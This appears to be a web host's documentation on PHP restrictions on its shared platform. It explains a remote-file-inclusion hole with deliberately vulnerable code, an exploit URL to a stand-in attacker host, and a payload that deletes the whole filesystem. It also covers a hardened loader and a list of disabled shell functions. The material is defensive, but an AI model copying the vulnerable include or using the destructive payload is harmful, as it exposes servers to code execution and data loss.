Overview

The TownNews platform is a shared hosting environment. This means that your web site and several others are being serviced on the same computers. The largest concerns in our hosting environment are:

  • Security - Access to files that belong to other customers, viewing passwords from other customers, and disgruntled employees trying to damage all sites on a system.
  • Resources - There are limitations to our hosting environment - we are always on the lookout for customers that fail to properly ensure their software actually scales or doesn't cause the whole system to shut down because of high CPU, disk, or memory requirements.

These reasons are why we must restrict the development environment from its "out-of-box" behavior.

PHP Restrictions

Including Remote Files

Sometimes, PHP lets you do things it shouldn't. One of them is allowing remote files to be executed without a care. An example script that loads template files using a variable follows:

    <?php

    // Vulnerable: the template name is taken straight from the request
    include($_REQUEST['template']);

    ?>

The above script is dangerous on most PHP installations. The author was probably intending this to be a simple template system - something like:

http://www.example.com/load.php?template=template.html

However, an attacker would exploit this script by doing something like this:

http://www.example.com/load.php?template=http://www.attacker.com/delete_everything.txt

The attacker's "text" document would contain something like:

    <?php

    require_once 'System.php';
    System::rm('-rf /');

    ?>

PHP would download the document from the remote host and execute the code locally - deleting everything on the system the web server has access to.

We've taken the liberty of "correcting" this issue by disabling remote inclusion of files for execution, but still allowing remote files to be downloaded for output purposes. The following functions have remote file download capabilities disabled entirely:

  • include()
  • include_once()
  • require()
  • require_once()
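
A template loader that stays safe even without the host-level include() restriction, as an added example that is not part of the original page and is not TownNews code. The templates/ directory, the allowlist entries and the resolve_template() helper are assumptions made for illustration:

```php
<?php
// Added example: hardened replacement for the load.php script shown above.
// resolve_template(), the templates/ directory and the allowlist entries
// are hypothetical names, not taken from the original page.

/**
 * Map a user-supplied template name to a file inside $dir.
 * Returns the absolute path, or null if the request must be rejected.
 */
function resolve_template($name, $dir, array $allowed)
{
    // Arrays (?template[]=x) and other non-strings are rejected outright.
    if (!is_string($name)) {
        return null;
    }
    // Strict allowlist match: a URL (http://..., php://...) or a traversal
    // string (../../x) can never be equal to an allowlisted file name.
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    // Defence in depth: resolve symlinks and confirm that the file really
    // lives under the template directory before touching it.
    $base = realpath($dir);
    $path = realpath($dir . '/' . $name);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$allowed = array('template.html', 'article.html');   // constructed sample names

// Read from $_GET only; $_REQUEST also merges in POST and cookie values.
$name = isset($_GET['template']) ? $_GET['template'] : null;
$path = resolve_template($name, __DIR__ . '/templates', $allowed);

if ($path === null) {
    http_response_code(404);
    exit('Unknown template');
}

// Templates are static HTML, so send the bytes instead of executing them:
// readfile() only outputs the file, while include() would run any PHP in it.
header('Content-Type: text/html; charset=utf-8');
readfile($path);
```

With this loader the request for template.html is served as before, while the request carrying a remote URL fails the allowlist comparison and returns a 404 before any file function is called.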

Disabled Functions

The following functions cannot be accessed from a PHP script:

  • apache_child_terminate
  • apache_get_modules
  • apache_get_version
  • apache_getenv
  • apache_lookup_uri
  • apache_note
  • apache_reset_timeout
  • apache_setenv
  • chgrp
  • chmod
  • chown
  • clearstatcache
  • disk_free_space
  • disk_total_space
  • diskfreespace
  • get_current_user
  • get_declared_classes
  • get_declared_interfaces
  • get_declared_traits
  • get_defined_constants
  • get_extension_funcs
  • get_included_files
  • get_loaded_extensions
  • get_required_files
  • highlight_file
  • ini_get_all
  • lchgrp
  • lchown
  • pfsockopen
  • php_ini_loaded_file
  • php_ini_scanned_files
  • php_logo_guid
  • php_sapi_name
  • php_uname
  • phpcredits
  • phpinfo
  • posix_getlogin
  • posix_kill
  • posix_mkfifo
  • posix_mknod
  • posix_setsid
  • posix_setuid
  • posix_ttyname
  • proc_close
  • proc_get_status
  • proc_nice
  • proc_open
  • proc_terminate
  • realpath_cache_get
  • session_save_path
  • shell_exec
  • show_source
  • socket_select
  • stream_select
  • umask
  • virtual
  • zend_logo_guid

Safe-Mode Aware Functions

  • exec()
  • passthru()
  • proc_open()
  • system()
  • popen()
  • dl() 
  • php_uname()
  • curl()
  • mail()

Restricted File System

Unlike other mass virtual hosting providers, TownNews has modified our PHP distributions to limit access within the programming environment to each web site. Essentially, your scripts have access to a limited number of locations on the file system. These restrictions help prevent exploits found in other web sites' code from being used to damage your web site.

BLOX access:

Other areas of the system are not available for general use. Note that this applies to PHP only. FTP access is available to data folders.

BLOX Extensions

BLOX /app sites have the following extensions preloaded and available:

  • curl
  • fileinfo
  • ftp
  • gd
  • gettext
  • json
  • mbstring
  • sqlite
  • sqlite3
  • uuid
  • zip

Memory Restrictions

Your script, including all of the class code and variable data, can only use up to 10MB of RAM (20MB on BLOX sites). This restriction also causes file uploads to be limited to about 7MB. Your script will automatically be terminated if it exceeds this limit.

Additionally, a safety net for PHP memory leaks is imposed on each Apache process - if somehow your script consumes more than 150MB in the form of a leak - it will be killed without warning. A prime example of this is the mysql_query() function, which loads the entire result set in memory for use with the PHP script. You would be well-advised to use mysql_unbuffered_query() instead.

mail_strerror

This function was written by TownNews in order to return a more detailed list of errors. An example of usage can be seen below, as well as a list of returned errors.

    <?php

    if(!($err = mail("root@townnews.com", "test", "test"))) {
        echo "The error is: ".mail_strerror($err)."\n";
    }

    ?>

If the mail function returns false, mail_last_error() can be called; the code it returns is an integer with the following meanings:

  • 0 - Mail was successfully delivered
  • -101 - An error occurred while creating a temporary delivery file
  • -102 - The FROM: field cannot contain more than one email address
  • -103 - Mail messages cannot be addressed to more than 3 recipients
  • -104 - The subject line cannot exceed 250 characters
  • -105 - One or more of the recipients are blacklisted
  • -106 - The rate limit for this address has been reached
  • -107 - Unable to connect to SMTP mail server
  • -108 - Unable to set from address
  • -109 - No valid SMTP recipients
  • -110 - Error while sending DATA
  • -111 - Unable to finalize SMTP transaction
  • * - An unknown error has occurred

Otherwise, you can call mail_strerror(), which will return the text-based error.

Deprecated modules and extensions

As of PHP 5.4.28 the following modules or extensions are deprecated:

  • mysql extension now uses mysqlnd internally
  • mime magic support is removed
  • sqlite2 is removed
  • sqlite3 function is deprecated and will be removed in PHP 5.5, switch to PDO sqlite
  • mysql extension is deprecated and will be removed in a future release, switch to PDO mysql
  • PHAR module was removed
  • PEAR modules removed:
    • XML_Serializer, XML_RPC, HTTP_Request, Net_URL, XML_Tree, HTML_Form, Net_DNS, DB, Auth_SASL, Mail_mimeDecode, Net_DIME, XML_RSS, Net_NNTP, Request2, Net_URL2, Net_DNS2, Log, Mail_Mime, File_Find, XML_Parser2, Net_Socket, Net_SMTP, Mail, HTTP2, PHP_Archive

As of PHP 5.5.13 the following modules or extensions are deprecated:

  • legacy sqlite3.so extension in favor of PDO sqlite
  • mime magic support is removed